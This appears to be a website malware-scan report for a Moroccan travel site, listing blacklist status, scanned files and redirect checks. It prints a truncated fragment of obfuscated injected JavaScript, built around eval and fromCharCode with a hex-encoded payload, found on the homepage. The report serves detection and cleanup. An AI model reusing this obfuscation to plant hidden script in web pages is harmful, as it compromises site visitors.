Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=greatmoroccotravel.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://greatmoroccotravel.com/ | 200 OK Content-Length: 35329 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ncvil="y";jfys="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[jfys].body)==null}()}catch(mzfm){ezgv=function(syy){syy="fr"+"omCh"+syy;for(bcupkf=0;bcupkf<ncvil.length;bcupkf++){gsju+=String[syy](izpxc(fop+(ncvil[bcupkf]))-(5));}};};izpxc=(eval);fop="0x";feyp=0;try{;}catch(jkjwjf){feyp=1}if(!feyp){try{++izpxc(jfys)["\x62o"+"d"+ncvil]}catch(mzfm){myb="^";}ncvil="25^6b^7a^73^68^79^6e^74^73^25^6d^77^67^35^3e^2d^2e^25^80^12^f^25^7b^66^77^25^78^79^66^79^6e^68^42^2c^66^6f^66 Antivirus reports:
| ||
http://greatmoroccotravel.com/Morocco Travel Tips miguel_files/modal-pop.js | 200 OK Content-Length: 277 Content-Type: application/javascript | clean |
http://greatmoroccotravel.com/test404page.js | 404 Not Found Content-Length: 12839 Content-Type: text/html | clean |
http://code.jquery.com/jquery-1.9.1.js | 200 OK Content-Length: 268381 Content-Type: application/x-javascript | clean |
http://suspended.hostgator.com/js/simple-expand.min.js | 200 OK Content-Length: 2782 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: greatmoroccotravel.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 23 Jan 2015 22:10:33 GMT
Accept-Ranges: bytes
Server: nginx/1.6.2
Content-Length: 35329
Content-Type: text/html
Last-Modified: Tue, 27 Aug 2013 22:01:07 GMT
...35329 bytes of data.
GET / HTTP/1.1
Host: greatmoroccotravel.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 23 Jan 2015 22:10:33 GMT
Accept-Ranges: bytes
Server: nginx/1.6.2
Content-Length: 35329
Content-Type: text/html
Last-Modified: Tue, 27 Aug 2013 22:01:07 GMT
...35329 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: greatmoroccotravel.com
Referer: http://www.google.com/search?q=greatmoroccotravel.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: greatmoroccotravel.com
Referer: http://www.google.com/search?q=greatmoroccotravel.com
Result:
The result is similar to the first query. There are no suspicious redirects found.